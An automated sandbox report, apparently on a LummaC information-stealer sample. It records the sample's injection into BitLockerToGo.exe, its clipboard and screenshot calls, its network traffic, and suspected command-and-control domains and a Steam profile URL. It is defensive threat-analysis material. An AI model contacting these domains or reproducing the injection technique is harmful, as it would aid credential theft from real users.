                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/A
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vozmeatillu.shop/apix
                Source: BW4pTs1x3V.exeString found in binary or memory: https://www.certum.pl/CPS0
                Source: BW4pTs1x3V.exeString found in binary or memory: https://www.globalsign.com/repository/0
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownHTTPS traffic detected: 172.67.188.210:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.209.193:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D07C60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_02D07C60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D07C60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_02D07C60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D07DE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_02D07DE0

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CDF9503_2_02CDF950
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CDFFE03_2_02CDFFE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CD12933_2_02CD1293
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D183703_2_02D18370
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CD10003_2_02CD1000
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CE301B3_2_02CE301B
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CDB1C03_2_02CDB1C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CD71503_2_02CD7150
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CDA1103_2_02CDA110
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CD51303_2_02CD5130
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CDA6603_2_02CDA660
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D077C03_2_02D077C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CFC75E3_2_02CFC75E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D167203_2_02D16720
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D184C03_2_02D184C0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CD84F03_2_02CD84F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF74AA3_2_02CF74AA
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D0E4493_2_02D0E449
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D134303_2_02D13430
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CFB5B03_2_02CFB5B0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CD35703_2_02CD3570
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CE0A8F3_2_02CE0A8F
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF2AA03_2_02CF2AA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF7A423_2_02CF7A42
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF7A603_2_02CF7A60
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D07A003_2_02D07A00
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D01A323_2_02D01A32
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF8BE03_2_02CF8BE0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CD7B503_2_02CD7B50
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF88F03_2_02CF88F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D0D8503_2_02D0D850
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D178003_2_02D17800
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CFB9F03_2_02CFB9F0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CE0E503_2_02CE0E50
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF7E263_2_02CF7E26
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CECFA03_2_02CECFA0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CDBCD03_2_02CDBCD0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D0ECB03_2_02D0ECB0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CF7C203_2_02CF7C20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CFADC03_2_02CFADC0
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CFCD803_2_02CFCD80
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CEEDAD3_2_02CEEDAD
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D19D503_2_02D19D50
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D17D003_2_02D17D00
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02CDAD203_2_02CDAD20
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02CDEA20 appears 179 times
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02CDC7A0 appears 52 times
                Source: BW4pTs1x3V.exeStatic PE information: Number of sections : 12 > 10
                Source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
                Source: BW4pTs1x3V.exe, 00000000.00000000.1453505977.00007FF67DB85000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameComparisonP. vs BW4pTs1x3V.exe
                Source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
                Source: BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
                Source: BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BW4pTs1x3V.exe
                Source: BW4pTs1x3V.exeBinary or memory string: OriginalFilenameComparisonP. vs BW4pTs1x3V.exe
                Source: 00000000.00000002.1885915924.000000C000506000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                Source: classification engineClassification label: mal93.troj.evad.winEXE@3/0@11/3
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D0739F CoCreateInstance,3_2_02D0739F
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeFile created: C:\Users\Public\Libraries\icikh.scifJump to behavior
                Source: BW4pTs1x3V.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: BW4pTs1x3V.exeReversingLabs: Detection: 60%
                Source: BW4pTs1x3V.exeString found in binary or memory: net/addrselect.go
                Source: BW4pTs1x3V.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                Source: BW4pTs1x3V.exeString found in binary or memory: OTbwLFHsAx/load.go
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeFile read: C:\Users\user\Desktop\BW4pTs1x3V.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\BW4pTs1x3V.exe "C:\Users\user\Desktop\BW4pTs1x3V.exe"
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: BW4pTs1x3V.exeStatic PE information: certificate valid
                Source: BW4pTs1x3V.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: BW4pTs1x3V.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: BW4pTs1x3V.exeStatic file information: File size 13565176 > 1048576
                Source: BW4pTs1x3V.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x53e600
                Source: BW4pTs1x3V.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x6e9200
                Source: BW4pTs1x3V.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: BitLockerToGo.pdb source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: BitLockerToGo.pdbGCTL source: BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C000760000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1885915924.000000C00079A000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000003.1875683062.0000023FE0C20000.00000004.00001000.00020000.00000000.sdmp, BW4pTs1x3V.exe, 00000000.00000002.1886207178.000000C00080E000.00000004.00001000.00020000.00000000.sdmp
                Source: BW4pTs1x3V.exeStatic PE information: section name: .xdata
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2020F pushad ; iretd 3_2_02D20212
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2022F pushad ; iretd 3_2_02D20232
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D200FB pushad ; iretd 3_2_02D200FE
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20093 push edx; iretd 3_2_02D20096
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20097 push edi; iretd 3_2_02D2009E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20087 push eax; iretd 3_2_02D2008E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2008F push ecx; iretd 3_2_02D20092
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D200AB pushad ; iretd 3_2_02D200AE
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20073 push edx; iretd 3_2_02D20076
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20077 push edx; iretd 3_2_02D2007A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2006F push ecx; iretd 3_2_02D20072
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20193 push ecx; iretd 3_2_02D20196
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20197 push eax; iretd 3_2_02D2019A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2019B push edi; iretd 3_2_02D201A2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20183 push edx; iretd 3_2_02D20186
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D201BF pushad ; iretd 3_2_02D201C2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20177 push ecx; iretd 3_2_02D2017E
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2017F push ecx; iretd 3_2_02D20182
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2016F pushad ; iretd 3_2_02D20172
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D20133 push edi; iretd 3_2_02D2013A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D206DF pushfd ; iretd 3_2_02D206E2
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D2253B push cs; retf 3_2_02D2254A
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D228B3 push ss; ret 3_2_02D22921
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3836Thread sleep time: -30000s >= -30000sJump to behavior
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: BW4pTs1x3V.exe, 00000000.00000002.1886477830.0000023FBB607000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02D15AD0 LdrInitializeThunk,3_2_02D15AD0

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CD0000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\BW4pTs1x3V.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2CD0000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
                Source: BW4pTs1x3V.exe, 00000000.00000003.1848932922.0000023FE0C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
